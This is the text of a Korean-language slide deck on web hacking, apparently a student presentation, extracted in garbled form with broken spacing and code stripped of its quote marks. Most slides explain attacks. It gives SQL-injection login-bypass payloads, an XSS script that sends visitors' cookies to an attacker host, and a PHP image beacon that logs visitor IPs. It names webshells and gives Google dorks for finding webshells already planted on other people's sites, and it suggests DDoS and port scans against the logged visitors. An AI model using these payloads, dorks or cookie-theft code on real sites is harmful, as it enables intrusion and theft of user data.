WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

Similar documents
Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

제목 레이아웃

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

3장

Windows 8에서 BioStar 1 설치하기

Observational Determinism for Concurrent Program Security

C H A P T E R 2

PowerPoint 프레젠테이션

FileMaker 15 WebDirect 설명서

MySQL-Ch05

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

Microsoft PowerPoint - 10Àå.ppt

슬라이드 1

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

초보자를 위한 ASP.NET 2.0

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

Web Scraper in 30 Minutes 강철

PHP & ASP

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

Secure Programming Lecture1 : Introduction

untitled

<C3CA3520B0FAC7D0B1B3BBE7BFEB202E687770>

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

76 XSS 하 Huge-IT Slider admin.php XSS

Building Mobile AR Web Applications in HTML5 - Google IO 2012

PowerPoint Template

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 )

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

AhnLab_template

PowerPoint Template

텀블러514

초보자를 위한 ASP.NET 21일 완성

2파트-07

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

Cookie Spoofing.hwp


슬라이드 1

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F31C2F7BDC32E >

untitled

PowerPoint 프레젠테이션

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

MySQL-Ch10

INDEX 들어가기 고민하기 HTML(TABLE/FORM) CSS JS

<4D F736F F D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378>

Microsoft PowerPoint MySQL 연동.ppt

6강.hwp

Discrete Mathematics

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

Javascript.pages

목차 Q-1. 데이터를 통한 음성통화가 되지 않습니다 Q-2. WiFi 연결이 안됩니다 Q-3. 인터넷 또는 네트워크 연결이 안됩니다 Q-4. 표준 부속품을 알려주시기 바랍니다 Q-5. 구입하였습니다만, 배터리는 어떻게 장착하

Microsoft PowerPoint 세션.ppt

ü M ysql 관련 PHP API 함수이해 ü PHP API 함수의활용 ü <form> 태그활용법 ü 변수전달방식의이해 ü API 함수를이용한데이터베이스관리

PowerPoint 프레젠테이션



Contents Activity Define Real s Activity Define Reports UI, and Storyboards Activity Refine System Architecture Activity Defin

<4D F736F F F696E74202D20C0A5BDA9C5BDC1F6BDC3BDBAC5DB28BDA9C5A9B8B029BCD2B0B3C0DAB7E15F76312E32315FB5F0C4DCC7C3B7AFBDBA2E707074>

BEef 사용법.pages

Week13

Microsoft Word - CrossSiteScripting[XSS].docx

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

웹서버보안취약점대응및조치 교육사이버안전센터

내지무인화_

문서 템플릿

PowerPoint Presentation

160322_ADOP 상품 소개서_1.0

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

쉽게 풀어쓴 C 프로그래밊

Chapter 1

Microsoft Word - junior.docx

1. SNS Topic 생성여기를클릭하여펼치기... Create Topic 실행 Topic Name, Display name 입력후 Create topic * Topic name : 특수문자는 hyphens( - ), underscores( _ ) 만허용한다. Topi

쉽게 풀어쓴 C 프로그래밍

untitled

Multi Channel Analysis. Multi Channel Analytics :!! - (Ad network ) Report! -! -!. Valuepotion Multi Channel Analytics! (1) Install! (2) 3 (4 ~ 6 Page

MIC Check 1pt ( pwnable ) 아마도 문제 제목을 저렇게 낸 이유는 공연 전 마이크 테스트를 하는 것처럼 쉬운 것을 하나 풀면서 몸이라도 푸라고 저렇게 정한 게 아닐까 배점은 1 점짜리, pwnable.kr 의 cmd 와 비슷한 문제

*2008년1월호진짜

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

(Microsoft Word - \301\266\301\326\272\300_XSS.docx)

PHP & ASP

하둡을이용한파일분산시스템 보안관리체제구현

The Basic Of Blind SQL Injection Sur3x5F - PRIDE NateOn : PRIDE in Sur3x5F All rights are reserved

untitled

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

C# - SQL Injection Vulnerability Code Main.aspx Page Language="C#" AutoEventWireup="true" CodeFile="Default.aspx.cs" Inherits="SQL_INJECTION._Defa

제20회_해킹방지워크샵_(이재석)

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

歯PLSQL10.PDF

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

Microsoft PowerPoint - 6.pptx

Microsoft Word - Windows_apahce_php_CUBRID2008

슬라이드 1

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

단계

Transcription:

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹

웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION

웹해킹 기법 업로드 취약점 다운로드 취약점

INJECTION 나는 사람입니다. 나는 잘생긴 사람입니 다.

INJECTION

INJECTION

INJECTION

SQL INJECTION

데이터베이스 데이터의 집합 테이블 필드

1학년 3반 6반 9반 양식( 번호, 이름, 사진

Select 문법 : Select 필드명 또는 별(*) fr om 테이블명 wher e 조건 예문 : Select user _id fr om accounts wher e user _name='장태진'; <? $connect = mysql_connect( localhost, r oot, r ootpasswor d ); mysql_select_db( dimigo ); $sql = Select user _id fr om accounts wher e user _name=\ 장태진\ ; $r esult = mysql_quer y($sql, $connect); $r ow = mysql_fetch_ar r ay($r esult); ECHO $r ow[user _id];?> test

SQL INJECTION <? $connect = mysql_connect( localhost, r oot, r ootpasswor d ); mysql_select_db( dimigo ); $id $pw = $_GET ['id']; = $_GET ['pw']; $sql = Select jumin fr om accounts wher e id='$id' and pw='$pw'; ; $r esult = mysql_quer y($sql, $connect); $r ow = mysql_fetch_ar r ay($r esult); ECHO $r ow[jumin];?> ID PW = testid = testpw http://example.co.kr/test.php?id=testid&pw=testpw 출력 : 980414-1******

SQL INJECTION <? $connect = mysql_connect( localhost, r oot, r ootpasswor d ); mysql_select_db( dimigo ); $id $pw = $_GET ['id']; = $_GET ['pw']; $sql = Select jumin fr om accounts wher e id='$id' and pw='$pw'; ; $r esult = mysql_quer y($sql, $connect); $r ow = mysql_fetch_ar r ay($r esult); ECHO $r ow[jumin];?> ID = admin PW = admin http://example.co.kr/test.php?id=admin&pw=admin 출력 : [출력값 없음]

SQL INJECTION <? $connect = mysql_connect( localhost, r oot, r ootpasswor d ); mysql_select_db( dimigo ); $id $pw = $_GET ['id']; = $_GET ['pw']; $sql = Select jumin fr om accounts wher e id='$id' and pw='$pw'; ; $r esult = mysql_quer y($sql, $connect); $r ow = mysql_fetch_ar r ay($r esult); ECHO $r ow[jumin];?> ID = admin' -PW = 아무거나

SQL INJECTION Select jumin from accounts where id='$id' and pw='$pw'; Select jumin from accounts where id='admin' -- ' and pw = 'admin'; Select jumin from accounts where id='admin' -- ' and pw = 'admin'; Select jumin from accounts where id='admin';

SQL INJECTION 기본 패턴 주민번호 출력 SQL 질의문 Select jumin from accounts where id='$id' and pw='$pw'; $id값 ' or 1 = 1 - 아이디' - ' or '1' = '1 1' or '1' like '1' -

SQL Injection 공격 패턴의 특징 1. 뛰어쓰기가 들어간다. 2. 특수문자 따옴표 ' 가 들어간다.

따옴표, 뛰어쓰기 막기 $user _id = admin' or 1=1 -- ; // 공격우회패턴 $sql = Select jumin fr om accounts wher e user _id='$user _id'; ; $r esult = mysql_quer y($sql, $connect); $r ow = mysql_fetch_ar r ay($r esult); ECHO $r ow[jumin];

따옴표, 뛰어쓰기 막기 $user _id = admin' or 1=1 -- ; // 공격우회패턴 $user _id = str _r eplace( ', & #.or d( ' ). ;, $user _id); $user _id = str _r eplace(, & nbsp;, $user _id); /* admin& #39;& #nbsp;or & #nbsp;1=1& #nbsp;-- */ $sql = Select jumin fr om accounts wher e user _id='$user _id'; ; $r esult = mysql_quer y($sql, $connect); $r ow = mysql_fetch_ar r ay($r esult); ECHO $r ow[jumin];

방금 전 소스로도 불안하다면? function r eplace_ascii($str ) { $tex t=$str ; $tex t2=""; for($i=0;$i<strlen($tex t);$i+ + ) { if(33<=or d($tex t[$i])& & ord($tex t[$i])<=47) $tex t2.="& #".ord($tex t[$i]).";"; else if(58<=ord($tex t[$i])& & ord($tex t[$i])<=64) $tex t2.="& #".ord($tex t[$i]).";"; else if(91<=ord($tex t[$i])& & ord($tex t[$i])<=96) $tex t2.="& #".ord($tex t[$i]).";"; else if(123<=or d($tex t[$i])& & ord($tex t[$i])<=126) $tex t2.="& #".or d($tex t[$i]).";"; else $tex t2.=$tex t[$i]; } $str=$tex t2; $str=str _r eplace(" ","& nbsp;",$str ); retur n $str ; } A-Z, a-z, 0-9를 제외하고 아스키코드가 33이상, 126이하인 모든 문자 아스키코드로!

HT ML Injection Cross Site Scripting CSS XSS

HT ML INJECT ION <html> <head></head> <body> <div>나는 사람입니다.</div> </body> </html>

HT ML INJECT ION <html> <head></head> <body> <div>나는 잘생긴사람입니다.</div> </body> </html>

HT ML INJECT ION <scr ipt> var aaa = <?=$_GET ['q'];? > ; aler t(aaa); </scr ipt>

HT ML INJECT ION <scr ipt> var aaa = ; location.hr ef = http://www.jtjsoft.com ; aler t(aaa); </scr ipt>

HT ML INJECT ION

HT ML INJECT ION 쿠키/세션 탈취 페이지 이동 알림창

HT ML INJECT ION JS에 도움 페이지 변조 훼이크

HT ML INJECT ION JS에서 하지 못하는 부 분 정보 저장 훼이크

HT ML INJECT ION - JS document.cookie Session 아이디 아이디 패스워드 주민번호 이름 집 주소

HT ML INJECT ION - JS location.hr ef = URL이동 - 개인정보공개 URL - 로그아웃 URL - 블로그 폐쇠 URL - 피싱사이트 (복제사이트)URL - 카페탈퇴 URL - 게시물 추천버튼 URL

HT ML INJECT ION - JS aler t( 메세지 ); 피싱사이트로 이동할때 도움 사용자를 불안하게 함

HT ML INJECT ION - HT ML Javascr ipt 에 도움 <<Javascript 필터링 우 회>> - <pre></pre> <textarea></textarea> - <input value= >

HT ML INJECT ION - HT ML 사이트 변조 < 사례 > - 네이트온 http://<script> - 웹하드 금칙어 우회

HT ML INJECT ION - HT ML 훼이크 - 정보숨기기 - 가짜 정보 보여주기 - 가짜 입력창 만들기

HT ML INJECT ION - PHP Javascr ipt 가 못하는 일 < 사례 > - IMG Header, 정보저장

HT ML INJECT ION - PHP 서버에 정보 저장

XSS 활용 - 1 <div> <pr e> 게시물내용게시물내용게시물내용게시물내용게시물내용게시물내용게시물 내용 게시물내용게시물내용게시물내용게시물내용게시물내용게시물내용게 시물내용 게시물내용게시물내용게시물내용게시물내용게시물내용게시물내 용게시물내용 게시물내용게시물내용게시물내용게시물내용게시물내용게시 물내용게시물내용 게시물내용게시물내용게시물내용게시물내용게시물내용 게시물내용게시물내용 게시물내용게시물내용게시물내용게시물내용게시물 내용게시물내용게시물내용 게시물내용게시물내용게시물내용게시물내용게 시물내용게시물내용게시물내용 게시물내용게시물내용게시물내용게시물내 용게시물내용게시물내용게시물내용 게시물내용게시물내용게시물내용게시 물내용게시물내용게시물내용게시물내용 게시물내용게시물내용게시물내용 게시물내용게시물내용게시물내용게시물내용 게시물내용게시물내용게시물 내용게시물내용게시물내용게시물내용게시물내용 게시물내용게시물내용게 시물내용게시물내용게시물내용게시물내용게시물내용 게시물내용게시물내 용게시물내용게시물내용게시물내용게시물내용게시물내용 게시물내용게시 물내용게시물내용게시물내용게시물내용게시물내용게시물내용 게시물내용 게시물내용게시물내용게시물내용게시물내용게시물내용게시물내용 게시물 내용게시물내용게시물내용게시물내용게시물내용게시물내용게시물내용 게 시물내용게시물내용게시물내용게시물내용게시물내용게시물내용게시물내용 </pr e> </div>

XSS 활용 - 1 <div> <pr e> </pr e> <scr ipt> V ar cookie = document.cookie; location.hr ef=( http://hacking.com/save.php?cookie= + </scr ipt> <pr e> </pr e> </div> cookie);

XSS 활용 - 1 사용자 사용자 사용자 사용자 호 이름 아이디 아이피 주민번

XSS 활용 - 1 User Hacker

XSS활용 -2 PHP http://hacking.kr /ipget.php <? // e.f. 127.0.0.1 $ip = $_SERV ER['REMOT E_ADDR']; $f = fopen(./ipip.tx t, a ); // ipip.tx t 생성/글 쓰기 fwr ite($f, $ip. \n ); // e.f. 127.0.0.1\n fclose($f); // 파일 닫기?>

XSS활용 -2 HTML <div> <pr e> </pr e> <img sr c= http://hacking.kr /ipget.php /> <pr e> </pr e> </div>

XSS활용 -2

XSS활용 -2 Ipip.tx t 127.0.12.1 127.123.2.1 127.0.220.12 127.23.50.11 127.103.0.14 127.0.60.15 127.20.0.134 127.10.50.177 127.1.0.12 127.0.40.133 127.110.0.13 127.0.30.112 127.140.0.19 127.0.2.187 127.0.120.10 127.120.230.144 127.0.10.132 127.20.20.13

XSS활용 -3 PHP http://hacking.kr /ipget.php <? Header ( Content-T ype: image/png ); $ip = $_SERV ER['REMOT E_ADDR']; $f = fopen(./ipip.tx t, a ); // ipip.tx t 생성/글 쓰기 fwr ite($f, $ip. \n ); // e.f. 127.0.0.1\n fclose($f); // 파일 닫기 $f = fopen(./a.png, r ); // a.png 생성/글쓰기 ECHO fr ead($f, filesize(./a.png )); // 이미지 fclose($f); // 파일 닫기

XSS활용 -3 Ipip.tx t 127.0.12.1 127.123.2.1 127.0.220.12 127.23.50.11 127.103.0.14 127.0.60.15 127.20.0.134 127.10.50.177 127.1.0.12 127.0.40.133 127.110.0.13 127.0.30.112 127.140.0.19 127.0.2.187 127.0.120.10 127.120.230.144 127.0.10.132 127.20.20.13

IP만 가져와서 뭐하냐고? 좋은예 : 자신의 블로그/카페의 방문자 확인 나쁜예 : 특정한 사람을 도발하는 글을 쓴 후 타겟들이 게시물을 보았을 때 아이피를 저장 D-DoS 포트스캔 후 취약한 포트들 분석 웹해킹 시스템해킹

업로드 취약점

웹쉘

웹쉘

r57 shell

C99 shell

AJAX Webshell

Wso 0

ITSEC

PHPSpy

PHPshell

평문소스 바이러스로 탐지하여 백신에서 삭제시킴

암호화된 소스 백신/웹쉘탐지 우회

올릴 수 있는 곳 이미지 업로드 부분 파일 업로드 부분 SQL INJECT ION 부 분

구글링으로 얻어먹기

./scr ipts/setup.php

Google Sear ch site:*/scr ipts/setup.php

12 10 8 1 열 6 2 열 3 열 4 2 0 1 행 2 행 3 행 4 행

망할! 구글링하여 나온 50개의 사이트 모두 안되요!

기냥 업로드된 웹쉘을 찾자! site:*/*/c99.php site:*/*/webshell.php site:*/*/r 57shell.php

이것들을 이용하여 할 수 있는 일

끝날시간ㅜ

죄송합니다. 고마워요!

선물을 하나 준비했어요.

저를 깔 수 있는 시간입니다.

QNA